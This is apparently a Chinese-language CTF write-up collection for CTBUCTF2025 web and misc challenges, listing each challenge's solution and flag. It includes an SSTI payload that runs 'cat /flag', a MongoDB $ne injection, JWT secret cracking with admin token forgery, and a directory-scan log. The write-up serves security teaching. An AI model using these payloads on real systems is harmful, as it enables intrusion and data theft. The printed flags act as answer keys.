前言第一次出题略显仓促,下次争取出些有意思的题,不过这届小登确实厉害
正在维护的网页
web简单题一般是按f12查看源代码,所以这里把f12ban掉了
其实快捷键不止这一个,ctrl+shift+i、ctrl+u、右键 甚至通过右上角的选项栏都能打开
flag:coctf{Y0U_w1lL_B3c0M3_7H3_W3B_k1Ng!}
Rubik’s Cube这题其实为了有趣,手动拼好也算一种解法,不过既然是web题目,肯定有更简单的方法
抓包发现了很多个js请求,不过不用一个个去看,一般叫main、index、game 这类的就是主文件,主干部分就在这里面,所以进入mian3.js里查看
审查代码发现有个if判断cube.isSolved()的返回值,根据名字可以看出是检查有无还原的函数,直接再控制台中输入cube.isSolved = function() { return true; };将其改为直接返回true即可,再转动魔方让其检查(看到有些选手使用了其他函数,也是可以的)
flag:coctf{J5_15_v3rY_1n ...
ez_signin查看源码,使用的的mongodb,可以使用{"$ne": null}列出所有的值
向/search发送post {"title": {"$ne": null}} 得到所有书籍,flag就在其中
flag: NSSCTF{b3a93cbc-8a05-4a10-b332-fabf9c91bcca}
EzCRC让AI生成的暴力破解密钥脚本
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105import randomimport stringdef compute_crc16(da ...
Don’t touch me考察点f12看源码
解题跟着源码里的路径访问
BlackMagic考察点trim函数
解题源码:
12345678910111213141516171819extract($_REQUEST);$strCharList = "\r\n\0\x0B ";$strFlag = "\r xxxxx...xxxxx \n";if(isset($strTmp)){ $strContent = trim($strFlag, $strCharList); if($strTmp == $strContent) { echo "flag{xxx...xxx}"; } else { echo "You're awesome, but not enough."; } }else { echo "I will ...
SSTI考察点python ssti
解题没有waf的ssti,用hackbar自带的payload即可
payload: {%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat /flag').read()}}{%endif%}{%endfor%}
flask_pin考察点flask_pin的生成
解题看报错有个?filename的接口可以读取文件内容,使用python脚本生成pin码
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import hashlibfrom itertools import chaindef mac(mac_ ...
网站被黑考察点php伪协议
解题请求头中找到hint,base32解密后是/n0_0ne_f1nd_m3/
访问后得到
123456789101112131415161718<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag|data|base|write|input/i",$file)){ echo "I am s ...
$$考察点将参数值作为变量名,php全局变量GLOBALS等
解题123456789101112131415161718<?php/*PolarD&N CTF*/highlight_file(__file__);error_reporting(0); include "flag.php";$a=$_GET['c'];if(isset($_GET['c'])){ if(preg_match('/flag|\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $a)){ die("oh on!!!");} else{ eval("var_dump($$a);");}& ...
jwt考察点jwt密钥爆破与生成
解题注册账号拿到jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QxMjMifQ.KBaDibvW3zIYwt-CYe0AKPbruXLW9VCHOHLx01PVaCk
123┌──(root㉿kali)-[~/c-jwt-cracker]└─# ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QxMjMifQ.KBaDibvW3zIYwt-CYe0AKPbruXLW9VCHOHLx01PVaCkSecret is "SYSA"
用工具爆破密钥
cyberchef生成admin的jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzUzNTkzMTcwfQ.r4xlmKEkSPc_m5aZI99Cmnt9hjosKVCyAwGwWQSKE88
登录后得到flag ...
php是世界上最好的语言考察点内置parse_str、extract函数,非法传参
解题123456789101112131415161718192021<?php//flag in $flaghighlight_file(__FILE__);include("flag.php");$c=$_POST['sys'];$key1 = 0;$key2 = 0;if(isset($_GET['flag1']) || isset($_GET['flag2']) || isset($_POST['flag1']) || isset($_POST['flag2'])) { die("nonononono");}@parse_str($_SERVER['QUERY_STRING']);extract($_POST);if($flag1 == '8gen1' && $flag2 ...
SWP考察点swp泄露+php正则回溯绕过
解题看题目可知是vim的缓冲区备份文件
用dirsearch扫描
1234567891011121314 _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12358Target: http://05003218-a7f1-4e4d-b88a-99a2bf9669c0.www.polarctf.com:8090/[22:17:16] Scanning:[22:17:17] 200 - 340B - /.index.php.swp[22:17:17] 200 - 44B - /index.php[22:17:46] 200 - 44B - /index.php/login/[22:17:57] 403 - 341B - /server-status[22:17:57] 403 - ...
MISC666和999的故事
将9替换成@得到一张二维码
扫描后得到flag
ctbuctf{The_Misc_Begins_Here_a00df5}
Do you know SSTV?听到这个声音就猜到是声音转图片,之前跟一个玩无线电的朋友玩过这个
不过手机上很容易受到杂音的干扰,看不请上面的字
电脑上用虚拟声卡播放看得很清楚
ctbuctf{N0thing_1s_impossible}
Ez_Base64
一把梭
ctbuctf{Base64_1s_Fun_7e6b89}
Zip_Master
AI梭
用bandizip打不开,但是用7zip可以打开
ctbuctf{Wooowoow_Yooua_Zip_Masteeeer!!!!!}
【签到】Welcome to CTBUCTF2025直接给的
ctbuctf{Welcome_to_CTBUCTF2025}
书读万遍其意自现
每次输入取一位secret,判断他加上key是否等于输入
ctbuctf{CAYLESsa ...























